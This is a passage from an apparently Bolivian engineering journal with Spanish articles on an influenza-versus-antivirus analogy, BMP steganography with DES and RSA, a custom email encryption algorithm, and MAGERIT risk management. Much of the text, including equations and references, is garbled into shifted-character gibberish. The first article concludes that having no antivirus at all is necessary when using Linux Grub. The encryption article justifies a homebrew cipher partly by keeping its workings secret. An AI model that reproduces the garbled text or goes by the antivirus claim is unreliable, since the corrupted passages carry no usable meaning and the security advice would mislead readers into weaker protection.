PARADIGMA DE CONTAGIO DE VIRUS DE INFLUENZA EN NIÑOS MENORES DE 2 AÑOS Y
FORMA DE EMPLEARLO
Debido a que los niños de una edad inferior a los
dos años cuyos receptores no se han desarrollado
se presenta una función de inmunidad a los diferen[LZ[PWVZKL]PY\ZLULZ[LJHZVHSKL\UHPUÅ\LUaH
común cuyas consecuencias en un niño muchas
más grandes generarían un mal estar tremendo, la
semejanza o paradigma que se emplea respecto a
la funcionalidad de no utilizar algún antivirus dentro
de una PC que funciona con Grub de Linux tiene
el mismo principio ya que no se ejecuta la activación por defecto al ser detectado un virus o archivo
THSPJPVZVWVYTLKPVKLSHJVUÄN\YHJP}UImZPJHKL
un antivirus ya sea con licencia o sin licencia, es
decir si no está activado un antivirus como puede
ser detectado un virus simplemente se lo ve como
un archivo mas pero no está activo si es que uno no
lo ejecuta por lo que simplemente tendría que eliminarlo de la unidad donde se encuentra, esto tamIPtUUVZZPY]LWHYHSPTWPHYHSN‚UÅHZOTLTVY`X\L
posea algún tipo de virus o que estén sus archivos
ocultos una forma esencial de ver los archivos ocultos dentro de una unidad extraíble es en línea de
comandos es utilizar dentro la unidad correspondiente (attrib –r –s –h /d /s) lo cual nos mostrara
archivos que se hayan ocultado y por lo tanto solo
hay que eliminar los tipos de archivos que nosotros
desconozcamos.
CONCLUSIONES
Se concluye que la efectividad se debe a una especie de inmunidad de virus solo por no tener un
medio que ejecute simultáneamente un scan a los
diferentes discos por lo tanto que es necesario no
tener ni un antivirus instalado si se utiliza Grub de
Linux para evitar que se eliminen archivos por defecto.
REFERENCIAS BIBLIOGRÁFICAS
‹ 5HJOV *HIHULa Introducción a virus y
antivirus.
‹ (UKYL^:;HULUIH\T:PZ[LTHZ6WLYHtivos
‹ 5LSZVUTratado
I
G
M
A
52
Representante de la carrera
en la competencia nacional
de programación - ACM
SISTEMA DE ESTEGANOGRAFÍA
BASADO EN IMÁGENES PARA
EL ENVIO Y RECEPCIÓN DE
INFORMACIÓN RESERVADA
López Quiroga Rubén Cristhian
Avenida General Lanza 2129
Sopocachi – La Paz Bolivia
Telf: 2422321
E-mail: [email protected]
Escuela Militar de Ingeniería
Irpavi – La Paz Bolivia
RESUMEN
El presente artículo expone el desarrollo de un sis[LTH LZ[LNHUVNYmÄJV WHYH THU[LULY ZLN\YH PUformación reservada que es enviada y recibida por
la organización. El sistema presentado hace uso
KLS Tt[VKV LZ[LNHUVNYmÄJV IP[ TLUVZ ZPNUPÄJH[Pvo aplicado en imágenes bmp para ocultar la información reservada y para incrementar el nivel de
ZLN\YPKHK[HU[VLUSHJVUÄKLUJPHSPKHKJVTVLUSH
PU[LNYPKHKZLHWSPJHUTt[VKVZJYPW[VNYmÄJVZZPTttricos y asimétricos. En el artículo se resumen las
metodologías para el desarrollo del sistema propuesto.
ABSTRACT
This paper presents the development of a system
[VTHPU[HPUZLJ\YLZ[LNHUVNYHWOPJJVUÄKLU[PHSPUformation that is sent and received by the organization. The system presented uses the LSB stegaUVNYHWOPJTL[OVKHWWSPLKITW[VOPKLJVUÄKLU[PHS
information and to increase the security level in both
[OLJVUÄKLU[PHSP[`HUK[OLPU[LNYP[`HWWS`Z`TTL[YPJ
and asymmetric cryptographic methods. The article
summarizes the methods for developing the proposed system.
PALABRAS CLAVE
Esteganografía, criptografía, imágenes bmp, inteNYPKHKJVUÄKLUJPHSPKHKUVYTHZKLZLN\YPKHK
A
R
nivel de seguridad sería mayor, por lo tanto, la utilización de un mecanismo portador del mensaje original que pueda ser transmitida sin levantar sospecha sobre la importancia de su recepción es ideal
WHYHNHYHU[PaHYSHJVUÄKLUJPHSPKHKLPU[LNYPKHKKL
la información reservada. Para transmitir información de manera segura, se ha desarrollado la esteganografía digital, consiste en ocultar un mensaje
en una imagen, archivo de video, audio, datos u
otros, que no levante sospechas y oculte la información secreta dentro de él.
El trabajo presentado propone un método para
ocultar información en un objeto que a simple vista
no detecte sospechas de lo que contiene y métodos para mantener segura información sensible al
momento de enviarla y recibirla asegurando su in[LNYPKHK`JVUÄKLUJPHSPKHK
A
D
I
PROBLEMÁTICA
Los métodos de seguridad empleados para manteULYSHJVUÄKLUJPHSPKHKLPU[LNYPKHKKLSHPUMVYTHJP}U
en varias organizaciones se encuentran desactualizadas, emplean equipos antiguos o métodos de cifrado clásicos que a pesar de combinar varios métodos
JYPW[VNYmÄJVZ ZVU JVUVJPKVZ ` MmJPSLZ KL YVTWLY
Existe una susceptibilidad en el manejo de software
para mantener la información reservada y más aún
de utilizar la Internet para enviar y recibir información
sin ser propensos a diversos ataques cibernéticos.
OBJETIVOS
INTRODUCCIÓN
Mantener segura la información durante el proceso de comunicación es de suma importancia para
cualquier organización, sobre todo para aquellas
que manejan información reservada. Si la información fuera transmitida de manera imperceptible el
P
El presente artículo está destinado a exponer el
proceso de construcción de un sistema de esteganografía que oculte mensajes de texto cifrados en
PTmNLULZWHYHSHWYV[LJJP}UKLSHJVUÄKLUJPHSPKHK
e integridad de la información reservada enviada y
recibida.
G
M
A
53
P
A
R
A
D
I
G
M
A
54
Para cumplir con el objetivo anteriormente expresado, se deben llevar a cabo los siguientes objetivos
LZWLJxÄJVZ!
‹ (WSPJHY\UHTL[VKVSVNxH`[tJUPJHKLLZ[LNHnografía para el cifrado de datos en imágenes.
‹ +L[LYTPUHY LS LX\PWHTPLU[V HKLJ\HKV WHYH
la utilización correcta de la aplicación.
‹ ,TWSLHY HSNVYP[TVZ KL LUJYPW[HJP}U WHYH LS
desarrollo del sistema.
‹ +LÄUPYJYP[LYPVZX\LWLYTP[HULZ[HISLJLYWHrámetros comparativos en relación con la esteganografía como solución para la protección segura de datos para disminuir el nivel
de riesgo de interceptación.
NORMAS INTERNACIONALES DE SEGURIDAD
Las organizaciones necesitan demostrar que realizan una gestión competente y efectiva de la seguridad de los recursos y datos que gestionan por lo
tanto necesitan de normas que deben cumplir.
La familia de la ISO 27000 trata de un conjunto de
UVYTHZX\LLZWLJPÄJHUSVZYLX\PZP[VZWHYHLZ[HISLJLY
implantar, poner en funcionamiento, controlar, revisar,
mantener y mejorar la seguridad de la información.
3H0:60,*LZWLJPÄJHSVZYLX\PZP[VZHJ\Tplir para implantar un Sistema de gestión de seguriKHKKLSHPUMVYTHJP}U:.:0JLY[PÄJHISLJVUMVYTL
a las normas 27000.
vada, es usada por el propietario para encriptar los
mensajes, mientras que la otra, llamada clave pública, es usada para desencriptar el mensaje.
TÉCNICAS DE ESTEGANOGRAFIA
Esteganografía es la disciplina en que se estudian
y aplican técnicas que permiten ocultar cualquier
información dentro de un objeto portador evitando
que personas no autorizadas conozcan la existencia de la información.
De acuerdo a los distintos objetos portadores, ya
sean imágenes, audio, video, texto u otros, existen
\UH NYHU JHU[PKHK KL Tt[VKVZ LZ[LNHUVNYHÄJVZ
Si se trabaja con imágenes, el método tradicional
JVUZPZ[L LU Z\Z[P[\PY SVZ IP[Z TLUVZ ZPNUPÄJH[P]VZ
(LSB), en una escala de color de 24 bits (más de 16
millones de colores).
Cada píxel de un archivo BMP de 24 bits está representado por tres bytes. Cada uno de estos bytes
contiene la intensidad de color rojo, verde y azul
(RGB: red, green, blue).
INGENIERÍA DEL SOFTWARE
La Ingeniería de Software es una disciplina de la
ingeniería que comprende todos los aspectos de la
producción de software desde las etapas iniciales
KLSHLZWLJPÄJHJP}UKLSZPZ[LTHOHZ[HLSTHU[LUPmiento de este después que se utiliza, tiene como
meta el desarrollo de software de calidad.
MÉTODOS DE CRIPTOGRAFÍA MODERNOS
La criptografía es la ciencia que estudia los métodos y procedimientos, mediante algoritmos ma[LTm[PJVZWHYHTVKPÄJHYSVZKH[VZKL[HSTHULYH
que solamente las personas que tengan la llave
adecuada puedan tener acceso a la versión original
`HZLN\YHYX\LSVZKH[VZUVM\LYVUTVKPÄJHKVZLUtre el remitente y el destinatario.
MÉTODOS SIMÉTRICOS
Utiliza una clave para la encriptación y desencriptación del mensaje. Esta clave se debe intercambiar
entre los equipos por medio de un canal seguro.
Ambos extremos deben tener la misma clave para
cumplir con el proceso.
MÉTODOS ASIMÉTRICOS
Se basa en el uso de dos claves diferentes, claves
que poseen una propiedad fundamental: una clave
puede desencriptar lo que la otra ha encriptado.
Una de las claves de la pareja, llamada clave pri-
METODOLOGÍA PARA EL DESARROLLO DEL
SOFTWARE
Se hizo referencia a la Ingeniería de Software y lo
que abarca como ser el software, las distintas metodologías de desarrollo que existen y entre ellas
se eligió MPR, Metodología de Prototipado Rápido,
debido a que está orientada al desarrollo de prototipos y fuertemente apoyada en tecnología de Bases
de Datos y herramientas visuales para Desarrollo
Orientado a Objetos.
De las seis fases para el desarrollo en las cuales
se basa la metodología, en el presente trabajo hará
uso de las siguientes fases:
‹ Fase 1:+LÄUPJP}UKLLZWLJPÄJHJPVULZLZ[H
primera fase tiene por objeto auditar la información de relativa al problema.
‹ Fase 2: Diseño Conceptual, el objetivo de
esta fase es construir un modelo de informaJP}U X\L YLÅLQL LS LZX\LTH JVUJLW[\HS KLS
prototipo.
‹ Fase 3: Desarrollo del Prototipo, esta fase
tiene por objeto la construcción del primer
prototipo operativo de la Aplicación.
‹ Fase 4: Pruebas del Usuario, en esta fase se
realizarán todas las pruebas necesarias para
validar el prototipo desarrollado en la fase
anterior.
Figura 2: Algoritmo RSA – Cifrar
P
A
ALGORITMOS APLICADOS
Se utilizan algoritmos de criptografía simétricos y
HZPTt[YPJVZ ,S HSNVYP[TV JYPW[VNYmÄJV ZPTt[YPJV
aplicado en el sistema es el algoritmo DES presen[HKVLUSHÄN\YH
R
Figura 1: Algoritmo DES
A
D
I
Fuente: José Gargallo Tuzón
,SHSNVYP[TVJYPW[VNYmÄJVHZPTt[YPJVHWSPJHKVLULS
sistema es el algoritmo RSA, para cifrar y descifrar
un mensaje utilizando este algoritmo se deben aplicar dos algoritmos. El algoritmo RSA para cifrar se
T\LZ[YHLUSHÄN\YH
Fuente: elaboración propia
G
M
A
55
P
El algoritmo RSA para descifrar se muestra en la
ÄN\YH
Figura 4: (SNVYP[TVLZ[LNHUVNYmÄJVIHZHKVLU3:)
Figura 2: Algoritmo RSA – Cifrar
A
R
A
D
I
Fuente: elaboración Propia
G
Fuente: elaboración propia
M
A
56
El desarrollo del sistema propuesto hace uso del
Tt[VKVKLLZ[LNHUVNYHMxH¸)P[TLUVZZPNUPÄJH[P]V¹
y con el modelo RGB. Se hace uso de este método
debido a la inserción de caracteres ascii en pixeles,
variando el color de un carácter en lo más mínimo
para que no sea detectada ninguna alteración en la
imagen por el ojo humano.
Un ejemplo de la aplicación del algoritmo previamente expuesto utilizado para ocultar una letra, saltando el paso del cifrado, en una imagen se detalla
a continuación.
La letra “A” tiene un valor binario de: 01000001. Insertando ese valor binario, bit a bit, en una imagen
)47ZLVI[PLULLSYLZ\S[HKVKLZJYP[VLUSHÄN\YH
Figura 5: Inserción de la Letra A
Para ocultar la información en imágenes BMP se
OPaV\ZVKLSHSNVYP[TVWYLZLU[HKVLUSHÄN\YH
Fuente: Elaboración Propia
,S IP[ TLUVZ ZPNUPÄJH[P]V JVUZPZ[L LU LS ‚S[PTV IP[
de un byte de uno canal de los tres canales de un
WP_LS 3H TVKPÄJHJP}U YLHSPaHKH LU SVZ IP[Z UV LZ
perceptible ante los ojos humanos. Sólo se utilizan
8 de los 9 bytes obtenidos de la agrupación de 3
pixeles.
La información que se encuentra oculta en una imagen se encuentra segura pero puede ser alterada si
la imagen es comprimida.
:L YLHSPaH SH ]LYPÄJHJP}U KLS [PLTWV KL KLZJPMYHKV
en meses que tardaría un interceptor en obtener la
información reservada mediante ataques de fuerza
bruta a un mensaje cifrado con el método de sustitución simple debido a que es el más utilizado y
a imágenes que contienen información cifrada con
los algoritmos DES y RSA dentro de sus pixeles.
La Tabla 1 muestra el resultado de la variación del
tiempo de descifrado y el incremento porcentual
del sistema propuesto con el método de sustitución simple.
Tabla 1 Variación del tiempo de descifrado
Sustitución
Simple
IMAGEN/
RSA
IMAGEN/
DES
Variación
%
68,109
528,102
-
675,38 %
68,109
-
547,068
703,22 %
Fuente: Elaboración Propia
De acuerdo a la tabla 1 se determina que el sistema
propuesto tiene un incremento mayor a 600% en
el tiempo de descifrado con los algoritmos DES y
RSA. Un interceptor tarda 6 veces más en descifrar una imagen que posee información oculta que
un mensaje cifrado con el método de sustitución
simple.
CONCLUSIONES
Se desarrolla una herramienta para mantener la información segura en el proceso de envío y recepción garantizando el incremento en el nivel de se-
N\YPKHK[HU[VLUSHJVUÄKLUJPHSPKHK`SHPU[LNYPKHK
Aplicar métodos de esteganografía al cifrado de
mensajes permite incrementar el nivel de seguridad
en el envío de información ya que evita que un interceptor se dé cuenta que el objeto portador, una
imagen bmp en el caso del presente trabajo, contiene información oculta.
En la utilización de la esteganografía, uno de los
campos de investigación más activas es herramientas de detección de masas para los contenidos
ocultos. Pero las pruebas estadísticas conocidos
son frágiles y los programas de incrustación no determinan que exactamente se encuentra oculto. El
[YmÄJVKLOV`LUSHZYLKLZW‚ISPJHZLZ\UWYVISLTH
que resulta muy difícil de comprobar rigurosamente
cada archivo que circula en las redes.
REFERENCIAS BIBLIOGRÁFICAS
‹ (UKLYZVU 9 HUK 7L[PJVSHZ - ¸6U [OL SPTP[Z VM
streganography”, IEE Journal on Selected Areas
in Communications, vol. 16. 1998.
‹ *VYSL[[P ,Z[YHKH (SLQHUKYV Documento denoTPUHKV! 0:6 L 0:6 Viena 2007.
Disponible en Web: http://blog.hispasec.com/
laboratorio/images/noticias/ISO-27001_e_ISO27004.pdf
‹ +VTxUN\La ,ZWPUVaH ,KNHY <YPLS ` 7HJOLJV
Gómez Leonardo. Criptografía, trabajo denominado “Algoritmos de Criptografía Clásica”. UNIVERSIDAD NACIONAL AUTÓNOMA DE MÉXICO. 2007.
‹ 05;,*60nstituto Nacional de Tecnologías de la
*VT\UPJHJP}U(Y[PJ\SVKLUVTPUHKV!¸,Z[LNHUVgrafía, el arte de ocultar información”
‹ 2LUUL` 7 9PLNLY - Guía de práctica privada
KLUVTPUHKH! ¹:[LNHUVNYHWO` BVUSPULD (SS 5L[
Tools – Library – Privacy Guide. Html” Disponible en Web: http://www.all-nettools.com/library.
privacy3
‹ 4LOKP ROHYYHaP /VZYL] ; Sencar, and Nasir
4LTVU ¸PTHNL Z[LNHUVNYHWO`! *VUJLW[Z HUK
practice”, in Proceeding of the IEE. 1998.
P
A
R
A
D
I
G
M
A
57
ALGORITMO DE ENCRIPTACIÓN PARA
ENVIO Y RECEPCIÓN DE MENSAJES
DE CORREO ELECTRÓNICO BAJO
NORMA ISO 27002
P
A
R
A
D
I
G
M
A
58
Jorge Andrés Martínez Choquetarqui
Departamento de Ingeniería de Sistemas – Escuela Militar de Ingeniería
La Paz - Bolivia
e-mail: [email protected]
RESUMEN
En el presente artículo se presenta el desarrollo de
un algoritmo de encriptación dentro del Ejército a
través de un modulo parte de un sistema gestor de
correo electrónico, de tal manera que pueda asegurarse la seguridad de este en términos de conÄKLUJPHSPKHKLPU[LNYPKHKLULSLU]xVKLTLUZHQLZ
dentro de la institución donde vaya a aplicarse, ya
que la información que se transmite es demasiado
sensible para ser libremente transmitida por un medio inseguro como son las redes actuales.
INTRODUCCIÓN
En los últimos años la criptografía se ha convertido
en una ciencia de enorme importancia y a la cual
se le destina cada vez un tratamiento serio y cien[xÄJVKLMVYTH[HSKLSVNYHYJVT\UPJHJPVULZZLN\ras. Como se verá esto no es una tarea para nada
sencilla. Uno de los puntos que siempre estuvo en
discusión sobre el almacenamiento de información
en computadoras digitales, fue la seguridad de los
TPZTVZMYLU[LHWVZPISLZWtYKPKHZKLJVUÄKLUJPHlidad, desde que la primera computadora hizo su
aparición en alguna organización militar o gubernamental la necesidad de resguardar la información
allí almacenada se hizo evidente.
El trabajo de grado desarrollado tuvo como objetivo
Diseñar un Algoritmo de encriptación para la transrecepción de mensajes dentro del Correo Electrónico Institucional del Ejército de Bolivia bajo la
noma ISO 27002 para reducir las vulnerabilidades
KLZLN\YPKHK[HU[VLUJVUÄKLUJPHSPKHKLPU[LNYPKHK
en el envío y recepción de mensajes privados.
PROBLEMÁTICA
El envío y recepción actual de mensajes por el Correo Electrónico Institucional dentro del Ejército
de Bolivia presenta vulnerabilidades de seguridad
[HU[VLUJVUÄKLUJPHSPKHKLPU[LNYPKHKLUSH[YHUZ-
recepción de mensajes privados ocasionando que
existan ataques de seguridad sobre el sistema gestor de correo actual.
Tomando como referencia el anterior problema se
inició el proceso de desarrollo del algoritmo tomando como base las matemáticas discretas; y más
LZWLJxÄJHTLU[LSHHYP[Tt[PJHTVK\SHY
JUSTIFICACIÓN
Si bien existen muchos modelos de encriptación
actuales (RSA, AES, etc.) las razones para elegir un
HSNVYP[TVU\L]VZLQ\Z[PÄJHUKLHJ\LYKVHSVZJYPterios siguientes:
‹ +LMVYTH[tJUPJHZL[PLULUSHZOLYYHTPLU[HZ
necesarias, así como los elementos adecuados para crear un nuevo elemento de seguridad para un medio que no explota sus beneÄJPVZJVTVLZLSJVYYLVLSLJ[Y}UPJV
‹ ;LJUVS}NPJHTLU[L WVYX\L \UH OLYYHTPLU[H
nueva de cifrado brinda un nivel de seguridad
más adecuado a la institución debido a que
inicialmente solo el encargado de la institución conoce el funcionamiento del algoritmo.
‹ ,JVU}TPJHTLU[L WVY LS HOVYYV KL [PLTWV `
optimización de procesos actuales que brinda la solución relativo al problema.
DESARROLLO DEL ALGORITMO
La metodología la cual dirige el proyecto es la de
desarrollo de algoritmos, debido a que el proyecto
se enfoca a la realización de un algoritmo de encriptación, sin embargo cada de los pasos de esta
metodología necesita o trabaja en conjunción con
otras metodologías, las cuales en este caso son el
Análisis de Riesgos y desarrollo de Software.
Por lo tanto, las 4 fases desarrolladas de la solución
LTWPLaHUJVUSHJVTWYLUZP}UKLSWYVISLTHWHYHÄnalizar con la Evaluación de la solución.
Comprensión del Problema
Es aquí donde se realizó el análisis de los datos
que están involucrados en el algoritmo. Dentro de
este paso se encuentra la Metodología SRM para
análisis de riesgos la cual se encargará de brindar
SVZJVU[YVSLZJYPW[VNYmÄJVZIHQVUVYTH0:6SVJ\HS
sirve como base de políticas para el algoritmo; de
este paso se extrajeron las normas aplicables, concluyendo en la necesidad de un algoritmo asimétrico.
Planteamiento de la Lógica
Para esta fase se realizaron los siguientes pasos:
‹ :L LSPNP} HS +PHNYHTH KL -S\QV JVTV YLWYLsentación del algoritmo en su totalidad.
‹ 7HYHSHYLWYLZLU[HJP}UTH[LTm[PJHZL[VTHron en cuenta la aritmética modular; y como
principios de ésta se cita a la siguiente:
representante cero (0), o también [0] constituida por
los números cuya diferencia sea par (los números
pares) y la clase de equivalencia con representante
uno (1), o también [1] constituida por los números
impares.
P
En base a la segmentación de grupos en clases de
equivalencia puede realizarse la exponenciación
modular de números, la cual se basa en el principio
de que si se eleva un número x a la potencia n, y de
ese resultado se obtiene su residuo con z, entonces
el resultado, xn mod z= y, elevado a un número inverso w y que este dentro del conjunto mod z, devuelve el número x original; lo cual para el modelo
de criptografía de clave asimétrica es fundamental
debido a la variedad obligatoria de las claves.
A
<UH ]La KLÄUPKH SH S}NPJH ZL NLULYH LS HSNVYP[TV
como tal, compuesto de los siguientes Diagramas
KL-S\QVJHKH\UVWVY\UWYVJLZVLULZWLJxÄJV!
Proceso de Generación de Claves
Relaciones de Congruencia Módulo N
Sea Z el conjunto de números enteros y R la relaJP}UZVIYLAKLÄUPKHWVYSHZPN\PLU[LL_WYLZP}U!
R
A
D
9$b_` ?í?_¶`LZT‚S[PWSVKLd
La relación entre x y y, x R y se escribe con el símbolo:
I
_ `TVK
Que se lee “x es congruente con y módulo 2”. La
YLSHJP}UHZxKLÄUPKHLZ\UHYLSHJP}UKLLX\P]HSLUJPH
sobre el conjunto de los números enteros porque:
‹ 7HYH[VKV_ ?ZLJ\TWSLX\L_ _TVK
`HX\LH¶H$$íX\LLZT‚S[PWSVKL
`WVY[HU[VSHYLSHJP}ULZYLÅL_P]H
‹ :LH_ `TVKLU[VUJLZ_¶`$R R Z, entonces, y –x = 2(-k) y por lo tanto, y – x
[HTIPtULZ\UT‚S[PWSVKLLZKLJPY!` _
(mod 2) y por tanto, la relación es simétrica.
‹ :P_ `TVK`` aTVKLU[VUJLZ!_¶
y = 2k1; y – z = 2k2
‹ +VUKLR`RZVUU‚TLYVZLU[LYVZ:\mando miembro a miembro las dos ecuaciones anteriores se obtiene: x – z = 2(k1 +
RSVX\LZPNUPÄJHX\L_ aTVK`WVY
[HU[V_ `TVK ` aTVKLU[VUJLZ
_ aTVK`SHYLSHJP}ULZ[YHUZP[P]H
Esta relación de congruencia módulo 2 determina
una partición del conjunto de los enteros Z en dos
clases de equivalencia: la clase de equivalencia con
G
M
Dónde:
‹ 3LZWYPTVYVI\Z[VWHYHVWLYHJPVULZJYPW[VNYmÄJHZ
‹ HLZLSU‚TLYVKL-LYTH[JVUU$
A
59
P
A
R
‹ W`XZVUU‚TLYVZHSLH[VYPVZX\LJ\TWSLUSH
condición de primos probables.
‹ *mSJ\SVKLUKLHJ\LYKVHM}YT\SH
‹ *mSJ\SVKL UKLHJ\LYKVHM}YT\SH
‹ YLZSHPU]LYZHTVK\SHYLU[YLL` USHJ\HS
se calcula aplicando el Teorema Chino del
Resto.
‹ .LULYHY \ZHUKV LS 7LX\L|V ;LVYLTH KL
Fermat:
‹ QPLZ\UU‚TLYVHSLH[VYPVJVTWYLUKPKVLU[YL
2 y L-1.
‹ *mSJ\SVKLaKLHJ\LYKVHM}YT\SH
‹ +L]VS\JP}UKL+H[VZ
Proceso de Cifrado de Mensajes
‹ .LULYHJP}UKL JVTVHSLH[VYPVJVTWYLUKPdo entre 2 y L-1.
‹ *HSJ\SVKL]HYPHISLKLHWLY[\YH`KLa»ZLgún fórmula.
‹ 7YPTLYH JHWH KL LUJYPW[HKV ZVIYL LS ]LJ[VY
de elementos numéricos Kp.
‹ :LNTLU[HJP}U KLS U\L]V ]LJ[VY LU ISVX\LZ
numéricos compatibles con la segunda capa
de encriptado.
‹ :LN\UKHJHWHKLLUJYPW[HKVZVIYLLS]LJ[VY
creado generando el mensaje cifrado.
‹ 9L[VYUVKLKH[VZLSTLUZHQLJPMYHKVSH]HYPHISLKLHWLY[\YH``\U]LYPÄJHKVYPU[LYUV
Proceso de descifrado de Mensajes
A
D
I
G
M
A
60
Dónde:
Dónde:
‹ LX\P]HSLU[L2 JVU]PLY[L LS [L_[V WSHUV 2 LU
su equivalente numérico ASCII y segmentar
por letra
‹ :LYLHSPaHSHPU[YVK\JJP}UKLSHJSH]LW‚ISPJH
del destinatario
‹ ISVX\LZ^W YLHSPaH SH ZLNTLU[HJP}U PU[LYUH
del texto cifrado para compatibilizarlo con
las operaciones de descifrado.
‹ ^BDJVU[PLULSHWYPTLYHJHWHKLKLZJPMYHKV!
aplicada a cada elemento segmentado en el
anterior paso.
‹ *mSJ\SVKLTKLHJ\LYKVHM}YT\SH
‹ 6I[LULYLSPU]LYZVTVK\SHYKLT`3HWSPJHUdo Teorema Chino del Resto.
‹ 2WBDJVU[PLULSH:LN\UKHJHWHKLKLZJPMYHdo: sobre cada elemento del vector w.
‹ <UP}UKL[VKVZSVZZLNTLU[VZNLULYHKVZLU
uno solo: el mensaje original K.
‹ 6I[LUJP}UKLSTLUZHQLVYPNPUHS2
+LÄUPKVLSWSHU[LHTPLU[VZLWYVJLKP}HSHJVKPÄcación, donde se obtuvieron los resultados de la
aplicación del algoritmo al módulo software.
*VKPÄJHJP}UKLS7YVISLTH
En esta fase se procedió al paso de la lógica representada en el Diagrama de Flujo a un lenguaje
máquina, en este caso a PHP.
Esta fase junto con la siguiente trabajan con la metodología de desarrollo de Software XP, dividido en
las siguientes fases:
‹ Fase 1 – Planeación: Donde se obtuvieron
SHZ LZWLJPÄJHJPVULZ NLULYHSLZ KLS 4}K\SV!
Historias de usuario y el contexto de desarrollo.
‹ Fase 2 – Diseño: Desarrollo de los prototipos
de las interfaces usando como referencia a
las historias de usuario.
‹ Fase 3 ¶ *VKPÄJHJP}U! (X\x ZL \UPLYVU SHZ
metodologías para generar el código en PHP
del algoritmo e introducirlo en las interfaces.
‹ Fase 4 – Pruebas: De aceptación y unitarias,
ZL[LZ[L}\UJVT\UPJHKVVÄJPHSKLS,QtYJP[V
con resultados exitosos.
Evaluación y ejecución de la Solución
Una vez que se terminó de escribir el algoritmo es
necesario comprobar que realiza las tareas para las
que ha sido diseñado y produce el resultado correcto y esperado.
Para comprobar el funcionamiento global del algoritmo se realizaron pruebas con textos de diferente
índole generados por herramientas que se encargan de evaluar la consistencia del algoritmo, los
cuales terminaron siendo positivos para los resultados esperados.
CONCLUSIONES
Este articulo presenta las directrices generales para
el desarrollo de un algoritmo de encriptación basado en un modelo asimétrico que sea capaz de responder a las necesidades de la institución donde
se aplica.
Los procedimientos por los cuales pasa el desarrollo son metodologías generales aplicadas a cubrir
requerimientos de Seguridad de la Información; sin
embargo, para que estos requerimientos sean tomados en cuenta, no deben basarse en opiniones
propias sino en normas.
Es por eso que el presente trabajo está enfocado
sobre la norma ISO 27002 y los controles de criptografía existentes que sirven como directrices de
diseño y desarrollo.
Así mismo, para futuros algoritmos, se pueden tomar las referencias matemáticas de éste, ya que
son principios universales que rigen la criptografía
como tal. Además se recomienda probar diferentes
alternativas de desarrollo de algoritmos como redes neuronales, circuitos o teorías recientes como
los fractales, con el objetivo de tener métodos de
seguridad de la información variados y robustos.
Con el algoritmo concluido y cada paso terminado,
se puede concluir que cada objetivo propuesto a
sido cumplido a cabalidad.
REFERENCIAS BIBLIOGRÁFICAS
‹ 4HZZHJO\ZL[[Z0UZ[P[\[LVM;LJOUVSVN`“La Crip[VNYHMxH!,ZJYP[\YH6J\S[H¹ Articulo del 24 de Octubre del 2010.
‹ (UKYL^Z .LVYNL ¸Number Theory”, Dover,
1994
‹ 7OLI` 1¹ Methodology and Economics”, Ed.
MacMillan Press LTD, Londres., 1988.
‹ .HSLUKL 1\HU *HYSVZ ¸/PZ[VYPH KL SH LZJYP[\YH
Cifrada¹,K*VTWS\[LUZL¡,KPJP}U4HKYPK
España, 1995.
P
A
R
A
D
I
G
M
A
61
DESARROLLO E
IMPLEMENTACIÓN DEL PROCESO
DE GESTIÓN DE RIESGOS EN
BASE A MAGERIT
P
A
R
A
D
I
G
M
Rocio Fabiola Angulo Velasquez
Departamento Ingeniería de Sistemas – Escuela Militar de Ingeniería
La Paz – Bolivia
E-mail: [email protected]
RESUMEN
El articulo presenta el desarrollo del proceso de
gestión de riesgos para evidenciar vulnerabilidades
y amenazas de un sistema a través de la realización
del análisis de riesgos considerándola como una
aproximación metódica para determinar el riesgo
siguiendo pasos pautados por la metodología MAGERIT y dando lugar a la gestión de riesgos que
permitirá el mantenimiento de un entorno controlado, minimizando los riesgos hasta niveles aceptables precautelando así la información.
de sistemas, métodos y herramientas destinados a
proteger la información.
El análisis de riesgos es una aproximación metódica que determina el riesgo siguiendo pasos pautados y dando así lugar a la gestión de riesgos que
permitirá el mantenimiento de un entorno controlado, minimizando los riesgos hasta niveles aceptables. La reducción de estos niveles se realizará
mediante el despliegue de medidas de seguridad,
que establecerá un equilibrio entre la naturaleza de
los datos y los tratamientos, los riesgos a los que
estén expuestos y las medidas de seguridad.
ABSTRACT
This paper presents the development of the process
of administration of risks to evidence vulnerabilities
and threats of the system through the realization of
the analysis of risks considering it like a methodical approach to determine the risk following steps
averaged by the methodology MAGERIT and giving
place to the administration of risks that will allow
the maintenance of a controlled environment, minimizing this way the risks until levels acceptable to
preserve the information.
PALABRAS CLAVE
Proceso de gestión de riesgos, análisis de riesgos,
MAGERIT, activos, amenazas, salvaguardas, tratamiento, seguridad.
Introducción.
A
La importancia de seguridad crece día a día, su inÅ\LUJPH HMLJ[H KPYLJ[HTLU[L H SHZ HJ[P]PKHKLZ KL
cualquier entorno informatizado, por lo cual se hace
necesario conocer si los sistemas informáticos están protegidos de cualquier tipo de intrusiones.
62
Tomando en cuenta la idea “lo que no está permitido debe estar prohibido” y para garantizar la
seguridad informática, se requiere de un conjunto
Existen diversas metodologías para realizar este
proceso, siendo la implementación metodología
MAGERIT la que se utilizara para procurar evidenciar vulnerabilidades y amenazas, precautelando
así la información.
Por lo tanto, el propósito de este estudio es el desarrollo e implementación del proceso de gestión
de riesgos en base a MAGERIT para mitigar las vulULYHIPSPKHKLZ`SVZYPLZNVZX\LZLHUPKLU[PÄJHKVZ
Se considera de forma sucesiva: la realización de
pruebas de Ethical Hacking para evidenciar vulnerabilidades de seguridad, la realización de un análisis
`L]HS\HJP}UKLYPLZNVZHWHY[PYKLSHPKLU[PÄJHJP}U
de amenazas y vulnerabilidades para determinar el
nivel de riesgo general de la información y establecer prioridades, la determinación del plan de acción
adecuado al diagnóstico y a las necesidades del
sistema de información para prevenir, impedir, reK\JPYVJVU[YVSHYSVZYPLZNVZPKLU[PÄJHKVZ`LSKLZHrrollo de un sistema informático para coadyuvar al
proceso de la gestión de riesgos de la información.
Problemática.
“Las medidas de seguridad de la información se
basan en criterio empírico y conocimiento aislado
de los responsables del sistema de información lo
cual genera vulnerabilidades en la seguridad del
TPZTVZPNUPÄJHUKV\UYPLZNV¹
‹ *VUVJPTPLU[V SPTP[HKV KL SHZ ]\SULYHIPSPKHdes de seguridad de la información.
‹ 3PTP[HJP}U LU SH KL[LYTPUHJP}U KLS UP]LS KL
riesgo de la información y establecimiento de
su prioridad.
‹ ,SUP]LSKLYPLZNVKLSHPUMVYTHJP}UUVLZYLgulado conforme a planes de acción adecuados.
‹ 3H NLZ[P}U KL YPLZNVZ KL SH PUMVYTHJP}U ZL
realiza de forma manual.
Ethical Hacking.
Para dar paso a la gestión de riesgos se evidencian
vulnerabilidades, comprobando que existen debilidades respecto a la seguridad de la información.
